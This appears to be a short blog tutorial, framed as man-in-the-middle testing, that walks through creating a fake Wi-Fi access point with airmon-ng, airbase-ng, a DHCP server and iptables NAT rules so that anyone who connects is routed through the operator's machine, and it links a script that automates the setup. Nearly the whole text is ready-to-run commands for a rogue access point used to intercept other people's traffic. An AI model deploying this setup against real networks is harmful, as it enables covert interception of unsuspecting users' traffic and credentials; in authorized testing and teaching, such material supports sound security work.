Hi to all!
In my last MITM test I needed to create a fake AP that can relay all incoming traffic to a wireless interface connected to Internet.
I’ve some trouble doing this with brctl (because you cannot create a bridge with a wireless interface), so I have create a little laborous setup with the help of iptables. Obviously, you need two wireless card to follow this (one for the softAP – wlan1 in this tutorial – and one connected to Internet – wlan0 in this tutorial).
First, you need to install a dhcp server:
|
1 |
apt-get install dhcp3-server -y |
Backup the default DHCP server configuration file:
|
1 |
mv /etc/dhcp3/dhcpd.conf /etc/dhcp3/dhcpd.conf.backup |
Create a new DHCP server configuration file:
|
1 |
nano /etc/dhcp3/dhcpd.conf |
and add these lines into the file:
|
1 2 3 4 5 6 7 8 9 10 |
ddns-update-style none; default-lease-time 600; max-lease-time 7200; subnet 10.0.0.0 netmask 255.255.255.0 { option subnet-mask 255.255.255.0; option broadcast-address 10.0.0.255; option routers 10.0.0.254; option domain-name-servers 8.8.8.8; range 10.0.0.1 10.0.0.140; } |
Then, start wlan1 in monitor mode:
|
1 |
airmon-ng start wlan1 |
Now, you have the interface mon0. So start your softAP (the -e option is used to specify the softAP ESSID, while the -c is used to specify the 802.11 channel):
|
1 |
airbase-ng -e SAhotspot -c 6 mon0 |
This will create a new interface called at0. Setup this interface:
|
1 |
ifconfig at0 10.0.0.254 netmask 255.255.255.0 up |
Now add a route for the traffic:
|
1 |
route add -net 10.0.0.0 netmask 255.255.255.0 gw 10.0.0.254 |
and setup new iptables rules:
|
1 2 3 4 5 6 7 |
iptables -F iptables -t nat -F iptables -X iptables -t nat -X iptables -t nat -A POSTROUTING -o wlan0 -j MASQUERADE iptables -A FORWARD -i at0 -j ACCEPT echo 1 > /proc/sys/net/ipv4/ip_forward |
Start the DHCP server on the at0 interface:
|
1 |
dhcpd3 -cf /etc/dhcp3/dhcpd.conf -pf /var/run/dhcp3-server/dhcpd.pid at0 |
Now all the people that connect to your fake AP will be routed trasparently to the Internet.
If you are too lazy to follow this tutorial, you can use a script I make to speed up fake AP creation.
Download it -> FakeAP.tar. Now decompress all the files in the same directory. Launch the script with:
|
1 |
./setupAP.sh <fakeAP-interface> <fakeAP-ESSID> <fakeAP-channel> <internet-interface> |
When your test are done, destroy the AP with:
|
1 |
./destroyAP.sh |
Feel free to leave a comment or to contact us. Any feedback will be appreciated!